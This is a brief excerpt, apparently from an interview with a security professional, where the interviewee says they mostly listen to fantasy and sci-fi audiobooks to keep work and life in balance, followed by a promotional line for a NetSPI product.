Is there a particular book, film, or podcast that made a significant impact on you? Can you share a story or explain why it resonated with you so much?

It is hard to think of a particular one because I mostly tend to listen to fiction (fantasy/sci-fi) audiobooks. I purposefully consume non-tech-related media as a way to maintain a balance between work and life.

You can read the full article on Medium!

Discover how NetSPI ASM solution helps organizations identify, inventory, and reduce risk to both known and unknown assets.

X